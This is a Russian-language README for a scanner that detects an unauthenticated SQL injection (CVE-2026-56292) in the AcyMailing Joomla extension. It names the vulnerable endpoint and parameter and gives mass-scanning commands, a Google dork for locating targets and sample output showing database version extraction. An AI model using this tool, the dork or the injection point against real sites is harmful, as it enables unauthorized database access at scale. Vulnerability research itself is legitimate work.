
CVE-2026-56292 - Сканер неаутентифицированных SQL-инъекций в AcyMailing для Joomla
Автор: nullwhisper
Только для авторизованных исследований безопасности / проверки уязвимостей.
AcyMailing для Joomla предоставляет публичную front-end задачу frontentityselect::loadEntityFront. В старых версиях параметр columns передаётся напрямую в SQL-запрос без санитизации. В исправленных версиях используется acym_secureDBColumn() и возвращается ошибка вида ... not secured.
index.php?option=com_acym&ctrl=frontentityselect&task=loadEntityFrontcolumns.
├── cve_2026_56292_acymailing_sqli.py # single + mass scanner
├── dorks.txt # google dorks
├── TECHNICAL.md # technical write-up
├── requirements.txt
├── LICENSE
└── README.md
pip3 install -r requirements.txt
Одиночная цель:
python3 cve_2026_56292_acymailing_sqli.py -u http://target/
Массовое сканирование:
python3 cve_2026_56292_acymailing_sqli.py -l targets.txt -v -T 30 -o vuln.txt
Опции:
-u URL single target
-l LIST target list file
-t TIMEOUT request timeout (default 30)
-T THREADS concurrent threads (default 10)
-o OUTPUT output file for vulnerable targets
-v verbose
--proxy PROXY http/https proxy
--patched-output FILE
--error-output FILE
Протестировано на установке AcyMailing v11.0.3 в локальной лаборатории Joomla 5 (режим симуляции уязвимости).
[*] Loaded 1 unique target(s)
[1/1] [+] VULNERABLE: http://127.0.0.1:8080/ -> version=10.11.18-MariaDB-ubu2204
[*] Done. Vulnerable: 1 | Patched: 0 | Error/Other: 0 | Total: 1
Смотрите dorks.txt. Основной дорк:
inurl:"index.php?option=com_acym"
Этот инструмент предназначен только для авторизованного тестирования безопасности и исследований. Не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного письменного разрешения. Автор (nullwhisper) не несёт ответственности за неправомерное использование или ущерб, причинённый данным кодом.
MIT — см. LICENSE.